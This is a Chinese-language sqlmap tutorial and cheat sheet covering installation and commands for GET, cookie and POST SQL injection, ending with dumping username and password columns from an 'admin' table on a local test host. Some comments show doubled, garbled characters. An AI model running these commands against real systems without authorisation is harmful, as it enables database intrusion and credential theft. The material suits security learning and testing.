sqlmap
sqlmap强大的注入工具, 跨平台, 使用python编写, 可以自定义tamper脚本
安装
linux下
sudo apt-get install sqlmap # 前提是已经有python的环境变量
运行sqlmap
sqlmap -u url # 直接sqlmap就可以
或者python sqlmap -u 也可以
win
先配置好python2的环境变量, 再从官网上下载sqlmap的源码包, 将sqlmap文件夹放在python的安装路径之下. 尝试
python sqlmap.py -u # 看看是否可以正常运行
运行sqlmap
必须加python才可以
三种注入判断方式
基本get注入及返回目标基本信息
python sqlmap.py -u "url"
获取数据库内数据:
python sqlmap.py -u url --dbs # --current-dbs 当前数据库
python sqlmap.py -u url -D 数据库名 --tables # 指定数据库内的表信息
python sqlmap.py -u url -D 数据库名 -T 表名 --columns # 数据库内表内的信息
python sqlmap.py -u url -D 数据库名 -T 表名 -C 指定的字段名 --dump 获取指定的字段内容
cookie注入
python sqlmap.py -u "url" --cookie "id=xx" --level 2
简单使用:
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dbs//判判断断是是否否存存在在cookie注入
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 -D xx --tables //猜解表名
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 -D xx -T admin --columns//猜解admin表表名名下下的的列列名名
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dump -C"username,password" -T admin -D xxx //获获取取指指定定列列名名admin下的数据
post注入
python sqlmap.py -u "url" --data "xx=xx&xx=xx"
基本使用同上
